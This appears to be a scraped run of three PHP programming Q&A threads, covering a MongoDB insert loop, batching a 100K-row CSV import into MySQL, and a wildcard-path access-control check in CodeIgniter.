The thing is that $startCol and $startRow are arrays, and it gives me a problem every time I want to run the document. Is there something ridiculously simple I'm missing here? Thanks in advance.
Chunk of code that's giving me problems:
$maxRows= count($currentarray); //Outputs 45
$maxCols= count($currentarray[0]); //Outputs 9
$currentRow=1;
$currentCol=1;
$testing = 1;
do {
while ($currentCol<$maxCols){
$startCol[] = $currentarray[0][$currentCol];
$startRow[] = $currentarray[$currentRow][$currentCol];
$currentCol++;
}
$obj = array( $startCol => $startRow );
$collection->insert($obj);
print_r ($collection);
if ($currentCol==$maxCols)
$currentCol=1;
$currentRow++;
$testing++;
//echo "<br />";
} while ($currentRow<$maxRows);
The problem I was getting was with my output statement. So my answer was fairly simple. After running print_r() on all of my variables, I found that I was in fact storing them, but I was calling them incorrectly at the end of the program.

More efficient way to process data feed of 100K entries?

I have a csv file that has roughly 100K entries I need to process and insert into a data base.
Previously it was very slow because it makes an SQL call for every entry. I do this though because if I try to build 1 single query to do this I will run out of memory.
I migrated to a new server and now I get an error every time I run it:
SQL Error : 2006 MySQL server has gone away
I am not sure, but I think this is just happening because of how inefficient my code is.
What can I do to make it perform better and not get the error?
Here is the code:
//empty table before saving new feed
$model->query('TRUNCATE TABLE diamonds');
$fp = fopen($this->file,'r');
while (!feof($fp))
{
$diamond = fgetcsv($fp);
//skip the first line
if(empty($firstline))
{
$firstline = true;
continue;
}
if(empty($diamond[17]))
{
//no price -- skip it
continue;
}
$data = array(
'seller' => $diamond[0],
'rapnet_seller_code' => $diamond[1],
'shape' => $diamond[2],
'carat' => $diamond[3],
'color' => $diamond[4],
'fancy_color' => $diamond[5],
'fancy_intensity' => $diamond[6],
'clarity' => empty($diamond[8]) ? 'I1' : $diamond[8],
'cut' => empty($diamond[9]) ? 'Fair' : $diamond[9],
'stock_num' => $diamond[16],
'rapnet_price' => $diamond[17],
'rapnet_discount' => empty($diamond[18]) ? 0 : $diamond[18],
'cert' => $diamond[14],
'city' => $diamond[26],
'state' => $diamond[27],
'cert_image' => $diamond[30],
'rapnet_lot' => $diamond[31]
);
$measurements = $diamond[13];
$measurements = strtolower($measurements);
$measurements = str_replace('x','-',$measurements);
$mm = explode('-',$measurements);
$data['mm_width'] = empty($mm[0]) ? 0 : $mm[0];
$data['mm_length'] = empty($mm[1]) ? 0 : $mm[1];
$data['mm_depth'] = empty($mm[2]) ? 0 : $mm[2];
//create a new entry and save the data to it.
$model->create();
$model->save($data);
}
fclose($fp);
You're probably exceeding MySQL's max_allowed_packet setting, which sets a hard limit (in bytes) on how long a query string can be. There's nothing wrong with doing multi-value inserts, but 100k of them is definitely pushing things.
Instead of doing all 100k at once, try doing 1000 in a loop. You're still reducing total query count (down from 100k to just 1000), so it's still a net gain.

Access Control Problem

I am developing an access control library for my project and I am looking to the best solution to do this:
I am getting all my access list from database to an array. In result it looks like this:
$array = array(
'*' => array('administrator' => TRUE),
'frontend/*' => array(
'user' => TRUE,
'unregistered' => TRUE
),
'backend/*' => array(
'user' => FALSE,
'unregistered' => FALSE
),
'backend/user/*' => array(
'moderator' => FALSE,
'supermoderator' => TRUE,
),
'backend/article/*' => array(
'supermoderator' => TRUE
),
'backend/article/add/new' => array(
'moderator' => TRUE
)
);
The "*" means the user has access to all of the related options; backend/article/* means that group has access to all article options (article/add, article/remove, ...).
As you see, there is no item in backend/article/add for supermoderator, but it has master access to all article pages.
What is the best way to check this? I tried array_walk() but I guess it won't help me.
Thank you for any advice...
I can share my whole code if you want.
* Edit *
Am I storing wrong? If you have the better solution to store it I will be happy to hear it.
Thank you for any advices
No matter what, this is going to be a complex algorithm; a simple array_walk won't do. Unless someone is feeling particularly generous and will write one for you, I suggest you hire a programmer.
Am I storing wrong? If you have the better solution to store it I will be happy to hear it.
It totally depends on your algorithm. You can probably write one that uses your current data format. You can also probably write a simpler one if you change your data format. But what your data format should look like then, well, that's a job for a programmer.
I found the answer myself:
Let's say the user is trying to access backend/article/add/new and this user is in the supermoderator group. So I need to look for backend/*, backend/article/*, backend/article/add/*. array_slice() and for() are enough for this:
I am using CodeIgniter by the way. I modified it a little bit to separate frontend and backend controllers. I am not using the application/controller directory. I am using application/backend and application/frontend directories for controllers.
So an uri pattern is this: http://site.com/[backend]*/[directory]*/class/method
// This is the page that user trying to reach
$requested_page = "backend/article/add/new";
// parsing...
$x = explode('/', $requested_page);
// this is needed to cut last 3, 2, 1 items of $x
$i = count($x) > 3 ? -4 : -count($x);
for (; $i < 0; $i++) {
$resource = implode('/', array_slice($x, 0, $i)) . '/*';
// echoing for debug
echo $resource;
}
// Outputs:
// backend/*
// backend/article/*
// backend/article/add/*
function userHasPermissions($permissionsArray, $user, $path) {
// Check exact
if(isset($permissionsArray[$path]) &&
isset($permissionsArray[$path][$user])) {
return $permissionsArray[$path][$user];
}
// Check lower and lower
$partArr = explode('/', $path);
for($i = substr_count($path, '/'); $i >= 0; $i--) {
if($i > 0) {
$choppedPartArr = array_slice($partArr, 0, $i);
$newPath = implode('/', $choppedPartArr) . '/*';
} else {
$newPath = '*';
}
if(isset($permissionsArray[$newPath]) &&
isset($permissionsArray[$newPath][$user])) {
return $permissionsArray[$newPath][$user];
}
}
return false;
}
echo "Result: " . (userHasPermissions($array, 'supermoderator', 'backend/article/add') ? "true" : "false");
Note that 'backend/article' will return false for 'supermoderator' since 'backend/article/*' does not match it. To change this, simply change $i = substr_count($path, '/'); to $i = substr_count($path, '/')+1;.
